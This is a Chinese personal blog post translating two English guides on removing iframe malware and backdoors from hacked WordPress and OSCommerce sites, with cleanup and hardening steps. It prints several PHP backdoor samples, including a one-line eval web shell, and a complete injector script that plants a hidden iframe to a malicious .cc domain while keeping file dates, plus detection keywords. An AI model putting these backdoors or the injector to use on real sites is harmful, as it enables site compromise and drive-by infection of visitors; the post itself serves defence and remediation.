Forfly 翔!
Mr. Le's personal blog, life, love and others. 人生就像是旅行,不必在乎目的地,只在乎沿途的风景!
All Rights reserved by Mr. Le

wordpress的iframe木马解决方案

wordpress的这个iframe木马确实非常厉害,感染之后很难去掉的。所以要养成良好的习惯,经常备份。

特此转载翻译两篇英文的IFRAME木马解决方案以供大家参考。

1. Evalbase64_decode Php virus

原版英文链接http://stackoverflow.com/questions/5922762/eval-base64-decode-php-virus

  • 关闭整个网站。通过修改.htaccess文件来禁止其他人访问,以便查看记录等。可以在.htaccess中加入“ order deny, allow deny from all allow from !! YOUR IP ADDRESS HERE!!
  • 下载所有网站的副本。
  • 安装一个文件比较软件,推荐使用WINMERGE。
  • 运行文件比较软件。
  • 找出不同的文件,加以解决。这个过程很关键,那些不同的文件可能就是黑客给修改的。
  • 检查你所有的密码,包括FTP,Cpanel,
  • 检查网站工作状态,重新开站。
  • 开门。主要是要恢复.HTACCESS文件。
  • 考虑自动检测的手段。
  • 定期备份。

以上只是大致翻译了一下,没有写具体的。思路是正确的。

2. Versatile .cc attacks.

原文地址http://blog.unmaskparasites.com/2011/03/02/versatile-cc-attacks/。 我举着这篇文章好。前面的就不翻译了,直接翻译解决办法。

2.1 病毒特征。

2.1.1  通常使用.cc的顶级域名作为恶意网站,主要以*.co.cc,*.cz.cc 和*.vv.cc. 这些域名任何人都可以免费注册。 既然黑客随机使用语句来定义域名,所以他们不担心名称无效。

2.1.2 黑客通常通过注入恶意代码(html,javascript 或PHP)来跳转网站到另外一个恶意的域名每天。

2.1.3. 篡改合法的文件不能改变黑客的修改数据,他们通常是644 (只有黑客自己能够改变)

2.1.4. 从你的网站文件中移除恶意代码是不够的,几小时后一个新的恶意代码又被注入到你网站页面。有时候,也注入了不同的地方,这让检查和自动移除相当困难。

Attack Vector攻击方法

During the last couple of weeks, I talked to many webmasters and hosting providers (special thanks to Michael Karr and Benjamin Davis from HostGator) and now have quite a complete picture of these .CC attacks

上几个周,我跟很多网站管理者讨论了(特别鸣谢xxx),现在有一个完整的.CC攻击的描述。

步骤一,通过通用网络应用的弱点来下载后门文件危害网站。

步骤二,通过后门进一步的危害网站。包括:注入恶意代码到合法文件中;生成更多的后门文件(包括注入后门到合法的php文件中);危及相同账号下的其他网站。

Backdoors后门

后门文件可以分散在账户下的整个服务器。但是后门文件一般会在静态目录中发现,例如“images“, “css“(比如image文件夹中的imageth.php-)。通常在有管理权限admin的代码中。wordpress程序中,一般会在模板themes和插件plugins目录中容易注入后门的script脚本。

Samples举例说明如下:

googlef0ee9bc90f224b30.php 在OSCommerce sites网站的根目录下,可能文件名不同,但是都类似于google的认证文件,尽管用php代替.TXT。

<?php if(isset($_GET[“797f0ee9bc90f224b30494aff31cb9″])){
$auth_pass=””;
$color=”#df5″;
$default_action=”FilesMan“;
$default_charset=”Windows-1251”;
preg_replace(“/.*/e”,“\x65\x76\x61\x6C\x2…skipped…=’\x29\x29\x29\x3B”,”.”);
} ?>

或者是

<?php $D=strrev(‘edoced_46esab‘);$s=gzinflate($D(‘7X1te…skipped…+Dw==’));create_function(”,”}$s//”); ?>

wordpress模板目下的img/index.php

<?php if (!function_exists(“T7FC56270E7A70FA81A5935B72EACBE29”)) { … preg_match(base64_decode(“LyhwcmludHxzcHJpbnR8ZWNobykv”), …. } eval(T7FC56270E7A70FA81A5935B72EACBE29(“QAAAPD…skipped…HrDdsw==”)); ?>

wordpress模板目录下的foot.php

<?php eval(@gzinflate(base64_decode(‘vP1rc+pItyaKfu9fUT…skipped…Amdfy+/vvf//1vf/vP//63/wE=’))); ?>

wordpress模板目录下的function.php

<?php if (isset($_REQUEST[‘asc’])) eval(stripslashes($_REQUEST[‘asc’]));
.
// This file is part of the Carrington Text Theme for WordPress

wordpress模板目录下的404.php。

<?php $_POST[“12”] && exit(@eval(@gzinflate(@base64_decode($_POST[“12”])))); if(isset($_COOKIE[“ln”])) { $sh = “7b1r…skipped…=”;exit(@eval(@gzinflate(@base64_decode($sh)))); } ?><?php
/**
* @package WordPress
* @subpackage Default_Theme
*/

index.php文件。

eval(gzinflate(base64_decode(‘7P37ehq58igM…skipped…a3TC11S/OK//Aw==’)));

Functionality功能性

To check what exactly hackers do with those backdoors, folks at HostGator hijacked one of such files and intercepted the code that cybercriminals wanted to execute on a compromised server:

检查黑客用这些后门做什么,HostGator的家伙劫持了这样的文件,并且截取代码执行危及服务。

<?php
error_reporting(0);set_time_limit(0);
$paths = '/home/redacted/public_html/redacted.com/index.html | /home/redacted/public_html/www.redacted.com/index.php | /home/redacted/public_html/redacted/index.php';
$paths = explode(' | ',$paths);
$frame_old='# *(eval\(base64_decode\(.+\)\);)|(<iframe.+</iframe>)#i';
$frame_new_php='eval(base64_decode(\'ZXJyb3JfcmVwb3J...skipped...w0KfQ==\'));';
$frame_new_htm = '<i frame src="hxxp://hgerwhu45 .co .cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw==" width="1" height="1"></iframe>';
foreach($paths as $path) {
$path = trim($path);
if(!is_writable($path)) continue;
$filetime=filemtime ($path);
$fd=fopen($path,"r");
$buffer=fread($fd, filesize($path));
fclose($fd);
$buffer=preg_replace($frame_old,'',$buffer);
if (strpos($path,'.php')!==false)
$buffer=preg_replace('#<\?php#i', '<?php '.$frame_new_php , $buffer , 1);
else
$buffer=preg_replace('#<body[^>]*>#i', '\\0'.$frame_new_htm , $buffer , 1);
$fd=fopen($path, "w");
fwrite($fd, $buffer);
fclose($fd);
touch($path , $filetime);
}
die('1111CHECKSTRING1111');
?>

如你所见:

  • this code searches for writable index files (index.html and index.php) and then tries to remove previous copy of the malicious code and inject a new revision. Note, the code is executed with site owners permissions so every file with 644 permission is writable. 这个代码查找可写入的首页文件(index.HTML和INDEX.PHP),然后试图移除以前的恶意代码并注入新的版本。注意,用网站管理者权限执行这个代码,每个文件都有644可写权限,
  • It injects an invisible .cc iframe HTML code into .html files and an obfuscated PHP code (that injects the same iframe plus some anti-bot logic) into .php files.  注入一个不可见的.cc iframe HTML代码到.html文件或者一个模糊的PHP代码(该注入相同IFRAM也加上一些反对的逻辑)到.PHP文件。
  • it preserves the modification date 。保持更改日期不变。

至网站管理者:

1. 找到并移除所有的后门script。

Ideally, all your server files are under some revision control, and all you need to do it check for latest changes (which will show you all changed/created files) and then discard all unauthorized modifications.

理论上,所有的服务器文件都有更改管理,你所要做的就是检查最后的更改(这些更改会告诉你所有的更改或者生成的文件)并且去掉所有的不被授权的更改。

Alternatively, scan all your server files for the following strings: “eval“, “base64_decode“, “edoced_46esab“, “gzinflate“, “gzuncompress” , “eval(stripslashes“, “FilesMan“. Sometimes, legitimate files can use these keywords, so make sure to check the found files manually. Here are some good signs that the code is not legitimate:

作为选择之一,扫描你所有服务器的文件,注意这些字符:“eval“, “base64_decode“, “edoced_46esab“, “gzinflate“, “gzuncompress” , “eval(stripslashes“, “FilesMan“.有事,合法的文件也使用这些字符,因此要手工检查发现的文件。下面是一些有可能不合法的信号:

  • Obfuscation – long strings of unreadable characters一些长的很难读懂的字符
    example: eval(@gzinflate(base64_decode(‘vP1rc+pItyaKfu9fUTti7b3e1W…
  • Using eval function to execute code that comes directly from user input  用EVAL功能来执行代码
    example: eval(stripslashes($_REQUEST[‘asc’]))

One more way to find backdoor scripts is to scan raw web server logs for suspicious POST requests. In a normal web application there shouldn’t be many files that process POST request so it won’t take long to filter out legitimate files. 能够发现后门脚步另外一个办法,就是检查web服务器的logs日志中的post请求。正常的web请求,不会有很多文件来执行post请求,因此它不会用很长时间来渗透合法的文件。

2. Prevent reinfection 防止再次被感染

Now that you’ve found and removed the backdoor scripts, you should make sure that hackers can’t upload and use new malicious files. 现在你已经发现了后门脚本,你应该确认黑客没有再上传并使用新的恶意文件。

Step #1. Upgrade all third-party applications to their latest versions on all of your websites. 更新所有的第三方应用到最新版本。

Step #2. Make sure web applications are properly configured and hardened. 确保网站应用合理的配置并坚固。

Here are some resources on hardening WordPress这是一些加固wordpress的方法。
http://codex.wordpress.org/Hardening_WordPress
and OSCommerce:

http://forums.oscommerce.com/topic/313323-how-to-secure-your-site/
http://blog.sucuri.net/2010/11/continuing-attacks-against-oscommerce-sites.html

Note that in case of OSCommerce, hackers like to use vulnerabilities in “/admin/file_manager.php” and “/admin/categories.php“. So Step #3 is to protect site’s admin interface. For example, you can password-protect access to this directory (.htaccess + .htpasswd) or restrict access from trusted IPs only (.htaccess).

Step #4. Since hackers like to upload backdoor scripts to images directories, you might want to configure directories with static content so that no files there can execute PHP code. For example, you can try this directive in a .htaccess file: 既然黑客喜欢传后门文件到images目录,有应该配置目录的静态内容,以便没有文件能够执行PHP代码。例如,你可以尝试在.htaccess文件中使用如下代码:

php_flag engine off

or these (depending on your server configuration)或者是(根据你服务器的配置)
RemoveHandler .php
RemoveType .php

3. Remove malicious code from your web pages 从你的网页中移去恶意代码。

If you have a fresh clean backup copy of your site, you can just remove everything and then restore the whole site form that backup. 如果你有最新的好的备份文件,你可以移除所有的,然后用备份恢复整个站点。

It is also very simple if your site is under revision control — just revert it to a known clean state. 如果你的网站有版本控制,那么很简单就可以回复到一个可知的好的状态。

Otherwise, you’ll need to clean files manually one-by-one. You should pay special attention to all index files (index.html, index.php, etc.), JavaScript files (.js) and .htaccess files. 否则你需要手工一步步的清楚文件,你要注意这些文件:index.html, index.php,javascript文件(.js)和.htaccess文件。

4. Request malware review if your site is blacklisted 如果网站被计入了黑名单,你需要重新申请。。

To unblock your sites, you should explicitly request a malware review via Google Webmaster Tools (Diagnostics -> Malware) for each blacklisted site individually. It will take about one day to review and remove malware warnings if your sites are found clean.

Note, without this request, it may take several weeks to unblock your sites even if they are clean.

Summary总结

This looks like a most versatile malware attack that I’ve ever seen:

  • They use multiple vulnerabilities in multiple web applications (e.g. OSCommerce, WordPress, Joomla, SohoLaunch, etc.)
  • They inject different types of malicious code (HTML and PHP) into different type of files (.html, .php, .js)
  • They even use .htaccess files to make PHP code in .js files executable.
  • On the same site, they may change injection types almost every day.
  • And of course, they change malicious domains every day (as many other malware attacks though)

As a result, these .cc attacks target more sites than other typical attacks that only use vulnerabilities of a single application. Plus compromise detection and clean up can be challenged by unpredictability of malware injections — their type and location.

Have your say

Please, let me know if I missed any important details about these .cc attacks. Maybe, you’ve come across different types of malicious content or infection vectors that you think can be related to what I described here. Your comments are welcome。

后面的一些,不是重点,就没有翻译了,但是相信大家已经知道该如何操作了。由于是原文翻译,转载请注明一下出处吧。谢谢浏览,如有问题请留言。

2011-06-02
2
Wordpress Record 技术
关键字:

发表回复